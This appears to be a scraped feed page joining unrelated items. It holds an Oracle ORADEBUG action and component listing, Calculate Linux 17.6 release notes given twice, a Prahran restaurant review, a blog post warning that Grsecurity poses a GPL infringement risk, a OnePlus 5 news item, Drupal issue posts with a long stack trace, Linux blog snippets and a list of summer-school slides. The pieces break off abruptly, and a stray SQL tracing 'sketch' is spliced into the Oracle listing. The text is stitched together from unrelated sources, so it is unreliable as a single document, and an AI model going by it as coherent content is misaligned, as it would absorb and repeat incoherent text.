OLAP_DUMP - Dump OLAP state
AWR_FLUSH_TABLE_ON - Enable flush of table id <level> (ids in X$KEWRTB)
AWR_FLUSH_TABLE_OFF
- Disable flush of table id <level> (ids in X$KEWRTB)
ASHDUMP - Dump ASH data (level = # of minutes)
ASHDUMPSECONDS - Dump ASH data (level = # of seconds)
HM_FW_TRACE - DIAG health monitor set tracing level
IR_FW_TRACE - DIAG intelligent repair set/clear trace
GWM_TRACE - Global Services Management set/clear trace
GWM_TEST - Global Services Management set/clear GDS test
GLOBAL_BUFFER_DUMP - Request global buffer dump (level 1 = TRUE)
DEAD_CLEANUP_STATE - Dump dead processes and killed sessions
IMDB_PINNED_BUFFER_HISTORY
- Dump IMDB pinned buffer history (level = (dump_level << 16 | num_buffers))
HEAPDUMP_ADDR - Heap dump by address routine (level > 1 dump content)
POKE_ADDRESS - Poke specified address (level = value)
CURSORTRACE - Trace cursor by hash value (hash value is address)
RULESETDUMP_ADDR - Dump rule set by address
kewmdump - Dump Metrics Metadata and Memory
con_id - Return Container Id as UB8
DBGT_SPLIT_CSTSTRING
DUMP_SWAP - dump system memory and swap information
ALERT_SWAP - issue alert message about system swap percentage
DUMP_PATCH - dump patch information
dumpBucketsRdbms

Actions in library GENERIC:
---------------------------
xdb_dump_buckets
dumpKGERing - Dump contents of KGE ring buffer
dumpKGEState - Dump KGE state information for debugging

Actions in library CLIENT:
---------------------------
kpuActionDefault - dump OCI data
kpuActionSignalCrash
- crash and produce a core dump (if supported and possible)
kpudpaActionDpapi - DataPump dump action


SQL> spool off
ORADEBUG DOC EVENT ACTION <action_name>
You can get more details about some actions by running the doc command for the library.action:

SQL> ORADEBUG DOC EVENT ACTION RDBMS.query_block_dump

ORADEBUG DOC COMPONENT


SQL> ORADEBUG DOC COMPONENT


Components in library DIAG:
--------------------------
diag_uts Unified Tracing Service (dbgt, dbga)
uts_vw UTS viewer toolkit (dbgtp, dbgtn)
diag_adr Automatic Diagnostic Repository (dbgr)
ams_comp ADR Meta-data Repository (dbgrm)
ame_comp ADR Export/Import Services (dbgre)
ami_comp ADR Incident Meta-data Services (dbgri)
diag_ads Diagnostic Directory and File Services (dbgrf, sdbgrf, sdbgrfu, sdbgrfb)
diag_hm Diagnostic Health Monitor ((null))
diag_ips Diagnostic Incident Packaging System ((null))
diag_dde Diagnostic Data Extractor (dbge)
diag_fmwk Diagnostic Framework (dbgc)
diag_ilcts Diagnostic Inter-Library Compile-time Service (dbgf)
diag_attr Diagnostic Attributes Management ((null))
diag_comp Diagnostic Components Management ((null))
diag_testp Diagnostic component test parent (dbgt)
diag_testc1 Diagnostic component test child 1 ((null))
diag_testc2 Diagnostic component test child 2 ((null))
KGSD Kernel Generic Service Debugging (kgsd)
diag_events Diagnostic Events (dbgd)
diag_adl Diagnostic ARB Alert Log (dbgrl, dbgrlr)
diag_vwk Diagnostic viewer toolkit (dbgv)
diag_vwk_parser Diagnostic viewer parser (dbgvp, dbgvl)
diag_vwk_uts Diagnostic viewer for UTS traces and files (dbgvf)
diag_vwk_ams Diagnostic viewer for AMS metadata (dbgvm)
diag_vwk_ci Diagnostic viewer for command line (dbgvci)
kghsc KGHSC Compact Stream (kghsc)
dbgxtk DBGXTK xml toolkit (dbgxtk)

Components in library RDBMS:
--------------------------
SQL_Compiler SQL Compiler ((null))
SQL_Parser SQL Parser (qcs)
SQL_Semantic SQL Semantic Analysis (kkm)
SQL_Optimizer SQL Optimizer ((null))
SQL_Transform SQL Transformation (kkq, vop, nso)
SQL_MVRW SQL Materialized View Rewrite ((null))
SQL_VMerge SQL View Merging (kkqvm)
SQL_Virtual SQL Virtual Column (qksvc, kkfi)
SQL_APA SQL Access Path Analysis (apa)
SQL_Costing SQL Cost-based Analysis (kko, kke)
SQL_Parallel_Optimization SQL Parallel Optimization (kkopq)
SQL_Plan_Management SQL Plan Managment (kkopm)
SQL_Plan_Directive SQL Plan Directive (qosd)
SQL_Code_Generator SQL Code Generator (qka, qkn, qke, kkfd, qkx)
SQL_Parallel_Compilation SQL Parallel Compilation (kkfd)
SQL_Expression_Analysis SQL Expression Analysis (qke)
MPGE MPGE (qksctx)
ADS ADS (kkoads)
SQL_Execution SQL Execution (qer, qes, kx, qee)
Parallel_Execution Parallel Execution (qerpx, qertq, kxfr, kxfx, kxfq, kxfp)
PX_Messaging Parallel Execution Messaging (kxfp)
PX_Group Parallel Execution Slave Group (kxfp)
PX_Affinity Parallel Affinity (ksxa)
PX_Buffer Parallel Execution Buffers (kxfpb)
PX_Granule Parallel Execution Granules (kxfr)
PX_Control Parallel Execution Control (kxfx)
PX_Table_Queue Parallel Execution Table Queues (kxfq)
PX_Scheduler Parallel Execution Scheduler (qerpx)
PX_Queuing Parallel Execution Queuing (kxfxq)
PX_Blackbox Parallel Execution Blackbox (kxf)
PX_PTL Parallel Execution PTL (kxft)
PX_Expr_Eval Parallel Execution Expression Evaluation ((null))
PX_Selector Parallel Execution PX Selector (qerpsel)
PX_Overhead Parallel Execution Overhead (qerpx, kxfr, kxfx, kxfp)
Bloom_Filter Bloom Filter (qerbl, qesbl)
Vector_Processing Vector Processing ((null))
Vector_Translate Vector Translate (qkaxl, qerxl, qesxl, qesxlp, qerrc)
Vector_Aggregate Vector Aggregate (qergv, qesgv)
Vector_PX Vector PX (qesxlp, qerxl)
Time_Limit Query Execution Time Limit (opiexe, qerst)
PGA_Manage PGA Memory Management ((null))
PGA_Compile PGA Memory Compilation ((null))
PGA_IMM PGA Memory Instance Manage ((null))
PGA_CMM PGA Memory Cursor Manage ((null))
PGA_ADV PGA Memory Advisor ((null))
rdbms_dde RDBMS Diagnostic Data Extractor (dbke)
VOS VOS (ks)
hang_analysis Hang Analysis (ksdhng)
background_proc Background Processes (ksb, ksbt)
system_param System Parameters (ksp, kspt)
ksu Kernel Service User (ksu)
ksutac KSU Timeout Actions ((null))
ksv_trace Kernel Services Slave Management (ksv)
file File I/O (ksfd, ksfdaf)
sql_mon SQL Monitor (keswx)
sql_mon_deamon SQL Monitor Deamon ((null))
sql_mon_query SQL Monitor Query ((null))
CACHE_RCV Cache Recovery (kcv, kct, kcra, kcrp, kcb)
DLF Delayed Log Force ((null))
DIRPATH_LOAD Direct Path Load (kl, kdbl, kpodp)
DIRPATH_LOAD_BIS Direct Path Kpodpbis Routine (kpodp)
RAC Real Application Clusters ((null))
GES Global Enqueue Service ((null))
KSI Kernel Service Instance locking (ksi)
RAC_ENQ Enqueue Operations ((null))
DD GES Deadlock Detection ((null))
RAC_BCAST Enqueue Broadcast Operations ((null))
RAC_FRZ DLM-Client Freeze/Unfreeze (kjfz)
KJOE DLM Omni Enqueue service (kjoe)
GCS Global Cache Service (kjb)
GCS_BSCN Broadcast SCN (kjb, kcrfw)
GCS_READMOSTLY GCS Read-mostly (kjb)
GCS_READER_BYPASS GCS Reader Bypass (kjb)
GCS_DELTAPUSH GCS Delta Push (kjb)
GSIPC Global Enqueue/Cache Service IPC ((null))
RAC_RCFG Reconfiguration ((null))
RAC_DRM Dynamic Remastering ((null))
RAC_MRDOM Multiple Recovery Domains ((null))
CGS Cluster Group Services (kjxg)
CGSIMR Instance Membership Recovery (kjxgr)
RAC_WLM Work Load Management (wlm)
RAC_MLMDS RAC Multiple LMS (kjm)
RAC_KA Kernel Accelerator (kjk)
RAC_LT RAC Latch Usage ((null))
db_trace RDBMS server only tracing ((null))
kst server trace layer tracing (kst)
ddedmp RDBMS Diagnostic Data Extractor Dumper (dbked)
cursor Shared Cursor (kxs, kks)
Bind_Capture Bind Capture Tracing ((null))
KSM Kernel Service Memory (ksm)
KSE Kernel Service Error Manager (kse)
explain SQL Explain Plan (xpl)
rdbms_event RDBMS Events (dbkd)
LOB_INODE Lob Inode (kdli)
rdbms_adr RDBMS ADR (dbkr)
ASM Automatic Storage Management (kf)
KFK KFK (kfk)
KFKIO KFK IO (kfkio)
KFKSB KFK subs (kfksubs)
KFN ASM Networking subsystem (kfn)
KFNU ASM Umbillicus (kfnm, kfns, kfnb)
KFNS ASM Server networking (kfns)
KFNC ASM Client networking (kfnc)
KFNOR KFN orion (kfnor)
KFIS ASM Intelligent Storage interfaces (kfis)
KFM ASM Node Monitor Interface Implementation (kfm)
KFMD ASM Node Monitor Layer for Diskgroup Registration (kfmd)
KFMS ASM Node Monitor Layers Support Function Interface (kfms)
KFFB ASM Metadata Block (kffb)
KFFD ASM Metadata Directory (kffd)
KFZ ASM Zecurity subsystem (kfz)
KFC ASM Cache (kfc)
KFR ASM Recovery (kfr)
KFE ASM attributes (kfe)
KFDP ASM PST (kfdp)
KFG ASM diskgroups (kfg)
KFDS ASM staleness registry and resync (kfds)
KFIA ASM Remote (kfia)
KFIAS ASM IOServer (kfias)
KFIAC ASM IOServer client (kfiac)
KFFSCRUB ASM Scrubbing (kffscrub)
KFIO ASM translation I/O layer (kfio)
KFIOER ASM translation I/O layer (kfioer)
KFV ASM Volume subsystem (kfv)
KFVSU ASM Volume Umbillicus (kfvsu)
KFVSD ASM Volume Background (kfvsd)
KFDX ASM Exadata interface (kfdx)
KFZP ASM Password File Layer (kfzp)
KFA ASM Alias Operations (kfa)
KFF KFF (kff)
KFD ASM Disk (kfd)
KFDVA ASM Virtual ATB (kfdva)
KFTHA ASM Transparent High Availability (kftha)
DML DML Drivers (ins, del, upd)
Health_Monitor Health Monitor ((null))
DRA Data Repair Advisor ((null))
DIRACC Direct access to fixed tables (kqfd)
PART Partitioning (kkpo, qespc, qesma, kkpa, qergi)
PART_IntPart Interval Partitioning ((null))
PART_Dictionary Partitioning Dictionary (kkpod)
LOB_KDLW Lob kdlw (kdlw)
LOB_KDLX Lob xfm (kdlx)
LOB_KDLXDUP Lob dedup (kdlxdup)
LOB_KDLRCI Lob rci (kdlrci)
LOB_KDLA SecureFile Archive (kdla)
SQL_Manage SQL Manageability (kes)
SQL_Manage_Infra Other SQL Manageability Infrastructure (kesai, kesqs, kesatm, kesutl, kessi, keswat, keswts, keswsq)
SQL_Tune SQL Tuning Advisor (kest)
SQL_Tune_Auto SQL Tuning Advisor (auto-tune) (kestsa)
Auto_Tune_Opt Auto Tuning Optimizer (kkoat)
SQL_Tune_Index SQL Tuning Advisor (index-tune) (kestsi)
SQL_Tune_Plan SQL Tuning Advisor (plan node analysis) (kestsp)
SQL_Tune_Px SQL Tuning Advisor (parallel execution) (kestsa)
SQL_Tune_Fr SQL Tuning Advisor (fix regression) (kestsa)
SQL_Test_Exec SQL Test-Execute Service (kestse)
SQL_Perf SQL Performance Analyzer (kesp, keswpi)
SQL_Repair SQL Repair Advisor (kesds)
SQL_trace_parser SQL trace parser (kesstp)
SQL_Analyze SQL Analyze (qksan)
SQL_DS SQL Dynamic Sampling Services (qksds)
SQL_DDL SQL DDL (atb, ctc, dtb)
RAT_WCR Real Application Test: Workload Capture and Replay (kec)
Spatial Spatial (md)
Spatial_IND Spatial Indexing (mdr)
Spatial_GR Spatial GeoRaster (mdgr)
Text Text (dr)
rdbms_gc RDBMS Diagnostic Generic Configuration (dbkgc)
XS XS Fusion Security (kzx)
XSSESSION XS Session (kzxs)
XSPRINCIPAL XS Principal (kzxu)
XSSECCLASS XS Security Class (kzxc, kzxsp)
XSXDS XS Data Security (kzxd)
XSVPD XS VPD ((null))
XSXDB_DEFAULT XS XDB ((null))
XS_MIDTIER XS Midtier (kpuzxs)
XSNSTEMPLATE XS Namespace template (kzxnt)
XSACL XS ACL (kzxa)
XSADM XS Administrative operation (kzxm, kzxi)
AQ Streams Advanced Queuing (kwq, kkcn, kpon, kpoaq, kpce, kpcm, kpun, kpuaq, kws)
AQ_DEQ Streams Advanced Queuing Dequeue (kwqid, kwqdl)
AQ_BACK Streams Advanced Queueing Background (kwsbg, kwsbsm)
AQ_TM Streams Advanced Queuing Time Manager (kwqit, kwqmn)
AQ_CP Streams Advanced Queuing Cross Process (kwscp, kwsipc)
AQ_LB Streams Advanced Queuing Load Balancer (kwslb, kwslbbg)
AQ_NTFN Streams Advanced Queuing Notification (kpond, kkcne)
AQ_NTFNP12C Streams Advanced Queuing pre-12c Notification (kwqic)
AQ_TMSQ Streams Advanced Queuing Time Manager for Sharded Queue (kwsbtm, kwsbjc, kwsbit)
AQ_MC Streams Advanced Queuing Message Cache (kwsmc, kwssh, kwsmb, kwsmsg, kwssb, kwschnk, kwscb, kwsdqwm, kwssbsh)
AQ_PT Streams Advanced Queuing Partitioning (kwspt)
AQ_SUB Streams Advanced Queuing Subscription (kwssi, kwssa, kwsnsm, kwsnsme)
KSFM Kernel Service File Mapping (ksfm)
KXD Exadata specific Kernel modules (kxd)
KXDAM Exadata Disk Auto Manage (kxdam)
KCFIS Exadata Predicate Push (kcfis)
NSMTIO Trace Non Smart I/O (nsmtio)
KXDBIO Exadata Block level Intelligent Operations (kxdbio)
KXDRS Exadata Resilvering Layer (kxdrs)
KXDOFL Exadata Offload (kxdofl)
KXDMISC Exadata Misc (kxdmisc)
KXDCM Exadata Metrics Fixed Table Callbacks (kxdcm)
KXDBC Exadata Backup Compression for Backup Appliance (kxdbc)
DV Database Vault (kzv)
ASO Advanced Security Option ((null))
RADM Real-time Application-controlled Data Masking (kzradm)
SVRMAN Server Manageability (ke)
AWR Automatic Workload Repository (kew)
ASH Active Session History (kewa)
METRICS AWR metrics (kewm)
REPOSITORY AWR Repository (kewr)
FLUSH AWR Snapshot Flush (kewrf)
PURGE AWR Snapshot Purge (kewrps)
AWRUTL AWR Utilities (kewu)
AUTOTASK Automated Maintenance Tasks (ket)
MMON MMON/MMNL Infrastructure (keb)
SVRALRT Server Generated Alert Infrastructure (kel)
OLS Oracle Label Security (zll)
AUDITNG Database Audit Next Generation (aud, kza, kzft, aus, aop, ttp)
Configuration ANG Configuration (aud, kza, kzft, aus, aop, ttp)
QueueWrite ANG Queue Write (aud, kza, kzft, aus, aop, ttp)
FileWrite ANG File Write (aud, kza, kzft, aus, aop, ttp)
RecordCompose ANG Record Compose (aud, kza, kzft, aus, aop, ttp)
DBConsolidation ANG Database Consolidation (aud, kza, kzft, aus, aop, ttp)
SYS_Auditing ANG SYS Auditing (aud, kza, kzft, aus, aop, ttp)
KJCI KJCI Cross Instance Call (kjci)
KJZ KJZ - DIAG (kjz)
KJZC KJZC - DIAG Communication Layer (kjzc)
KJZD KJZD - DIAG Main Layer (kjzd)
KJZF KJZF - DIAG Flow Control Layer (kjzf)
KJZG KJZG - DIAG Group Services Layer (kjzg)
KJZH KJZH - DIAG API Layer (kjzh)
KJZM KJZM - DIAG Membership Layer (kjzm)
SEC Security (kz)
CBAC Code-Based Access Control (kzc)
dbop DBOP monitoring (keomn)
dbop_gen DBOP generic service (keomg)
dbop_deamon DBOP monitoring Deamon (keomg)
dbop_comp DBOP composite type (keomm)
em_express EM Express (kex)
orarep orarep (ker)
Data Data Layer (kd, ka)
KDS Kernel Data Scan (kds)
KDSRID Fetch By Rowid (kdsgrp, kdsgnp)
KDSFTS Full Table Scan (kdsttgr, kdstgr)
KDSCLU Cluster Table Scan (kdsics, kdscgr)
KDI Index Layer (kdi)
KDIZOLTP OLTP HIGH Index (kdizoltp)
KDXOKCMP Auto Prefix Compressed Index (kdxokcmp)
KDIL Index Load (kdil)
RAT Real Application Testing (kec)
RAT_MASK Real Application Testing: Masking (kesm, kecprm)
BA Backup Appliance (kbrs)
KBC BA Containers (kbc)
connection_broker Connection Broker (kmp)
KRA Kernel Recovery Area Function (kra)
KRA_SQL KRA SQL Tracing ((null))
KRB Kernel Backup Restore (krb)
KRB_THREAD KRBBPC Thread Switches ((null))
KRB_IO KRB I/O ((null))
KRB_INCR KRB Incremental Restore ((null))
KRB_PERF KRB Performance Tracing ((null))
KRB_BPOUTPUT Detailed Backup Piece Output ((null))
KRB_BPVAL Detailed Block List During Restore Validate ((null))
KRB_FLWRES Details on Restore Flow ((null))
KRB_FLWCPY Details on krbydd Flow ((null))
KRB_FLWBCK Details on Backup Flow ((null))
KRB_FLWUSAGE RMAN Feature Usage ((null))
KRB_OPTIM Unused Space Compression ((null))
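A component name from these listings can be plugged into the diagnostic event syntax to enable tracing. As a hedged sketch (the exact trace-level keywords depend on the Oracle version; shown here in the 11g+ Unified Tracing style):

```sql
-- Sketch only: enable optimizer tracing using a component name from the
-- RDBMS library listing above.
ALTER SESSION SET EVENTS 'trace[SQL_Optimizer.*] disk=highest';

-- Show the documentation for a single component:
-- SQL> ORADEBUG DOC COMPONENT SQL_Optimizer
```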
          Calculate Linux 17.6 is out   

We are pleased to present the new release of Calculate Linux 17.6, published to mark the project's 10th anniversary!

The new version adds support for installing the system in an LXC/LXD container and for creating custom themes, improves binary package stability by accounting for automagic dependencies, and improves security by password-protecting changes to the bootloader's kernel boot parameters and by granting individual users the right to update the system.

The following editions are available for download: Calculate Linux Desktop with the KDE (CLD), Cinnamon (CLDC), MATE (CLDM) or Xfce (CLDX) desktop, Calculate Linux Scratch (CLS), Calculate Directory Server (CDS), Calculate Scratch Server (CSS), Timeless, and Calculate Linux Container (CLC).

Main changes

System installation

  • Calculate now includes a new distribution, Calculate Linux Container, for installation under LXC/LXD virtualization.
  • The default guest user password is no longer carried over into the installed system; instead, the user is prompted to set one explicitly.
  • Access rights can now be configured in Calculate Console; access can be restricted to system updates only.
  • Added support for setting a password on changes to kernel boot parameters.
  • Added a sudo group for obtaining superuser rights via the utility of the same name.
  • When installing from a Live image, automatic partitioning is now used by default.
  • Creation of a bios_boot partition during automatic partitioning is disabled for UEFI.
  • The UEFI boot record is no longer rewritten if its parameters have not changed.
  • Dependencies needed only for building packages have been removed from the distributions.

System update

  • The number of binary packages in the repository has been increased to 9546.
  • Added caching of the binary package index, which is now updated together with the Portage tree.
  • Added support for a compressed index file no larger than 1 MB.
  • The system settings fix-up step is no longer run if the repositories were not updated.

System build

  • Added support for building a system for installation under LXC/LXD virtualization.
  • Added support for detecting automatic dependencies.
  • Packages with detected undeclared (automagic) dependencies are now rebuilt.
  • Added the @autodeps set, which contains the missing dependencies.
  • Disabled the --with-bdeps option, which pulls in dependencies needed only for building packages.
  • Added the --clean-bdeps parameter to remove build-only packages from the assembled system.
  • Disabled the preliminary computation of the list of packages to update.

Appearance

  • Added support for changing the system theme and profile settings via the /etc/calculate/ini.env configuration file.
  • Added the cl-setup-themes utility for reapplying themes.
  • Added a background image in the terminal.

Miscellaneous

  • Restored cl-passwd, the command for changing a domain user's password.
  • Fixed a boot error with the Intel video driver.
  • Fixed PXE installation.
  • Fixed detection of the NVMe disk type.
  • The system PROXY is no longer used when fetching files from the update server.
  • Fixed an input problem with the Bulgarian and Kazakh languages.
  • Fixed domain user login with an encrypted profile.
  • Disabled configuration of network interfaces used for a network bridge.
  • Added initial Estonian language support to the Calculate utilities.

Package lineup

  • CLD (KDE desktop):
    • KDE Frameworks 5.35, KDE Plasma 5.9.5, KDE Applications 17.04.2, LibreOffice 5.2.7.2, Firefox 54.0
    • i686 - 1.8 G, x86_64 - 2.0 G
  • CLDC (Cinnamon desktop):
    • Cinnamon 3.4, LibreOffice 5.2.7.2, Firefox 54.0, Evolution 3.22.6, Gimp 2.8.22, Rhythmbox 3.4.1
    • i686 - 1.6 G, x86_64 - 1.8 G
  • CLDM (MATE desktop):
    • MATE 1.18, LibreOffice 5.2.7.2, Firefox 54.0, Claws Mail 3.15.0, Gimp 2.8.22, Clementine 1.3.1
    • i686 - 1.7 G, x86_64 - 1.8 G
  • CLDX (Xfce desktop):
    • Xfce 4.12, LibreOffice 5.2.7.2, Firefox 54.0, Claws Mail 3.15.0, Gimp 2.8.22, Clementine 1.3.1
    • i686 - 1.5 G, x86_64 - 1.7 G
  • CDS (Directory Server):
    • OpenLDAP 2.4.44, Samba 4.5.10, Postfix 3.1.6, ProFTPD 1.3.5e, Bind 9.11.0_p5
    • i686 - 682 M, x86_64 - 722 M
  • CLS (Linux Scratch):
    • Xorg-server 1.19.3, Kernel 4.9.34
    • i686 - 748 M, x86_64 - 872 M
  • CSS (Scratch Server):
    • Kernel 4.9.34, Calculate Utilities 3.5.5.6
    • i686 - 464 M, x86_64 - 504 M
  • Timeless (New server):
    • OpenLDAP 2.4.44, Calculate Utilities 3.5.5.6
    • i686 - 489 M, x86_64 - 529 M

Upgrading

To upgrade, run cl-update, or download the new image into the /var/calculate/linux directory and run cl-install.



          Food Adventures: Mr Miyagi    
99 Chapel Street, Prahran
(03) 95295999

Mr. Miyagi on Urbanspoon

I love the vibe of this place. It's lively but not too noisy. The menu has a great variety, the service is attentive and the food tastes just as good as it looks. I never realised that this gem on Chapel Street was so close to home but often we take for granted what's right in our back yard, don't we?

The restaurant runs walk-in style; however, they do take early bookings from 5:30-6:30pm for groups of 1-5, and groups of 6 or more can book into an early or late sitting.


Nori Taco - grilled salmon belly, vinegar rice, spicy nappa cabbage, Japanese mayo, chilli oil ($12) #datthumb


Tonkatsu Pork - crumbed pork goodness, chardonnay pickled pear, celeriac and apple salad ($10)


Battered Corn - tempura sweet corn kernels, freshly popped corn, corn salt and corn mayo ($15/3pc)


Scallop Pancakes - Hokkaido scallops, vegetable & smoked bacon pancake, shaved bonito flakes ($18/3pc)

Salmon Tartare - avocado, shallot, radish, cucumber, yuzu yoghurt pearl, nori potato crisps ($18) - excuse the terrible photo... I think I was too excited to dig into the first dish of the night! This was hands down my favourite dish.

Green Tea Soba Noodle Salad with konbu infused salmon ($23) 



Hello Kitty Sours - lychee, citrus & egg white ($16)



          kernel-4.11.8-1-x86_64   
kernel-4.11.8-1-x86_64
          Warning: Grsecurity: Potential contributory infringement risk for customers   

It’s my strong opinion that your company should avoid the Grsecurity product sold at grsecurity.net because it presents a contributory infringement risk.

Grsecurity is a patch for the Linux kernel which, it is claimed, improves its security. It is a derivative work of the Linux kernel that touches the kernel internals in many different places. It is inseparable from Linux and cannot work without it; it would fail a fair-use test (obviously; ask offline if you don’t understand). Because it is so strongly derivative of the kernel, it must be under the GPL version 2 license, or a license compatible with the GPL and with terms no more restrictive than the GPL's. Earlier versions were distributed under GPL version 2.

Currently, Grsecurity is a commercial product and is distributed only to paying customers. My understanding from several reliable sources is that customers are verbally or otherwise warned that if they redistribute the Grsecurity patch, as would be their right under the GPL, they will be assessed a penalty: they will no longer be allowed to be customers, and will not be granted access to any further versions of Grsecurity. GPL version 2, section 6 explicitly prohibits the addition of terms such as this redistribution prohibition.

Read more


          Calculate Linux 17.6 released   

We are happy to announce the release of Calculate Linux 17.6, marking the 10th anniversary of the project.

This new version features installation in LXC/LXD containers, theme customization, more stability with automagic dependencies support, better security as editing the kernel params now requires a password and system update can be only performed by users authorized to do so. You will find the details below.

Calculate Linux Desktop featuring KDE (CLD), Cinnamon (CLDC), Mate (CLDM), or Xfce (CLDX) environments, Calculate Linux Scratch (CLS), Calculate Directory Server (CDS), Calculate Scratch Server (CSS), Timeless and Calculate Linux Container (CLC) are available for download.

Read more


          Upside-down mounted display a possible cause of the OnePlus 5's odd scrolling effect   
The display in the OnePlus 5 is mounted upside down in the device. This is apparent from a hardware teardown and an inspection of the kernel. No direct link between this and the odd effect that can occur when scrolling has been established, but the two do appear to be related.
          Drupal core: Aug. 14: Remove assertIdentical methods in favour of assertSame in core/tests/Drupal/KernelTests   

There are lots of calls to deprecated assertIdentical() in kerneltests. Replacing them is a simple matter using sed.

This issue is only about replacing the calls in kerneltests, since replacing the calls in other tests outside kerneltests is a bit more complicated to get right.
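The sed replacement described above might look like the following sketch; the file name and its contents are hypothetical stand-ins, and the real patch would run over core/tests/Drupal/KernelTests (and would likely also need to handle assertNotIdentical separately):

```shell
# Create a sample kernel test file containing deprecated assertions
# (hypothetical content, for illustration only).
cat > /tmp/ExampleKernelTest.php <<'EOF'
$this->assertIdentical($expected, $actual);
$this->assertIdentical(42, $result, 'The result should be 42.');
EOF

# Replace the deprecated assertIdentical() calls with assertSame().
sed -i 's/assertIdentical(/assertSame(/g' /tmp/ExampleKernelTest.php

cat /tmp/ExampleKernelTest.php
```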


          Module Filter: undefined index line 160 of module_filter.module   

Hundreds of copies of the following error message are flooding the Drupal 8 dblog ...

PROBLEM:
Undefined index: in module_filter_system_modules_recent_enabled_submit() (line 160 of module_filter.module)

Notice: Undefined index: xmlsitemap_engines in module_filter_system_modules_recent_enabled_submit() (line 160 of /{website-path}/modules/contrib/module_filter/module_filter.module) #0 /{website-path}/core/includes/bootstrap.inc(566): _drupal_error_handler_real(8, 'Undefined index...', '/home/iisiaqdm/...', 160, Array) #1 /{website-path}/modules/contrib/module_filter/module_filter.module(160): _drupal_error_handler(8, 'Undefined index...', '/home/iisiaqdm/...', 160, Array) #2 [internal function]: module_filter_system_modules_recent_enabled_submit(Array, Object(Drupal\Core\Form\FormState)) #3 /{website-path}/core/lib/Drupal/Core/Form/FormSubmitter.php(111): call_user_func_array('module_filter_s...', Array) #4 /{website-path}/core/lib/Drupal/Core/Form/FormSubmitter.php(51): Drupal\Core\Form\FormSubmitter->executeSubmitHandlers(Array, Object(Drupal\Core\Form\FormState)) #5 /{website-path}/core/lib/Drupal/Core/Form/FormBuilder.php(585): Drupal\Core\Form\FormSubmitter->doSubmitForm(Array, Object(Drupal\Core\Form\FormState)) #6 /{website-path}/core/lib/Drupal/Core/Form/FormBuilder.php(314): Drupal\Core\Form\FormBuilder->processForm('system_modules', Array, Object(Drupal\Core\Form\FormState)) #7 /{website-path}/core/lib/Drupal/Core/Controller/FormController.php(74): Drupal\Core\Form\FormBuilder->buildForm(Object(Drupal\system\Form\ModulesListForm), Object(Drupal\Core\Form\FormState)) #8 [internal function]: Drupal\Core\Controller\FormController->getContentResult(Object(Symfony\Component\HttpFoundation\Request), Object(Drupal\Core\Routing\RouteMatch)) #9 /{website-path}/core/lib/Drupal/Core/EventSubscriber/EarlyRenderingControllerWrapperSubscriber.php(123): call_user_func_array(Array, Array) #10 /{website-path}/core/lib/Drupal/Core/Render/Renderer.php(574): Drupal\Core\EventSubscriber\EarlyRenderingControllerWrapperSubscriber->Drupal\Core\EventSubscriber\{closure}() #11 /{website-path}/core/lib/Drupal/Core/EventSubscriber/EarlyRenderingControllerWrapperSubscriber.php(124): 
Drupal\Core\Render\Renderer->executeInRenderContext(Object(Drupal\Core\Render\RenderContext), Object(Closure)) #12 /{website-path}/core/lib/Drupal/Core/EventSubscriber/EarlyRenderingControllerWrapperSubscriber.php(97): Drupal\Core\EventSubscriber\EarlyRenderingControllerWrapperSubscriber->wrapControllerExecutionInRenderContext(Array, Array) #13 [internal function]: Drupal\Core\EventSubscriber\EarlyRenderingControllerWrapperSubscriber->Drupal\Core\EventSubscriber\{closure}() #14 /{website-path}/vendor/symfony/http-kernel/HttpKernel.php(144): call_user_func_array(Object(Closure), Array) #15 /{website-path}/vendor/symfony/http-kernel/HttpKernel.php(64): Symfony\Component\HttpKernel\HttpKernel->handleRaw(Object(Symfony\Component\HttpFoundation\Request), 1) #16 /{website-path}/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\Component\HttpKernel\HttpKernel->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #17 /{website-path}/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\Core\StackMiddleware\Session->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #18 /{website-path}/core/modules/page_cache/src/StackMiddleware/PageCache.php(99): Drupal\Core\StackMiddleware\KernelPreHandle->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #19 /{website-path}/core/modules/page_cache/src/StackMiddleware/PageCache.php(78): Drupal\page_cache\StackMiddleware\PageCache->pass(Object(Symfony\Component\HttpFoundation\Request), 1, true) #20 /{website-path}/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\page_cache\StackMiddleware\PageCache->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #21 /{website-path}/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(50): Drupal\Core\StackMiddleware\ReverseProxyMiddleware->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #22 /{website-path}/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): 
Drupal\Core\StackMiddleware\NegotiationMiddleware->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #23 /{website-path}/core/lib/Drupal/Core/DrupalKernel.php(656): Stack\StackedHttpKernel->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #24 /{website-path}/index.php(19): Drupal\Core\DrupalKernel->handle(Object(Symfony\Component\HttpFoundation\Request)) #25 {main}.


          BTTB: looping for shell script under embedded linux   
You may have already noticed that Linux turns up in many places: web servers, storage servers, desktops, kiosk machines, and mobile devices. Yes, more and more devices are running embedded Linux, and Android, too, is built on a modified Linux kernel! Resources are still scarce, though, and embedded Linux can be very different from Linux hosted […]
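A minimal example of the post's subject, a loop written in portable POSIX sh, the kind of construct that still works under the minimal shells common on embedded systems, such as BusyBox ash:

```shell
#!/bin/sh
# Portable POSIX loop: avoids bashisms like {1..3} ranges or arrays,
# which minimal embedded shells (e.g. BusyBox ash) may not support.
i=1
while [ "$i" -le 3 ]; do
    echo "iteration $i"
    i=$((i + 1))
done
```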
          Install Gentoo for kernel hacking   
I am curious about what the Linux kernel actually does. Many years ago, put off by the tedious steps involved, I gave up diving into it at the very first stage, which is compiling the kernel. But recently this urge came back to me. I started to wonder whether there exists a Linux distro […]
          China sees Hong Kong as inviolable core territory despite agreement   
The visit by China's communist president, Xi Jinping, to Hong Kong on the 20th anniversary of the city-state's incorporation into China is about showing that China is in charge. While Hong Kong officially has a s ...
          Slides: Machine Learning Summer School @ Max Planck Institute for Intelligent Systems, Tübingen, Germany   


Here are the slides of some of the presentations at the Machine Learning Summer School at the Max Planck Institute for Intelligent Systems, Tübingen, Germany

Shai Ben-David
(Waterloo)
 Learning Theory.
Slides part 1 part 2 part 3
Dominik Janzing
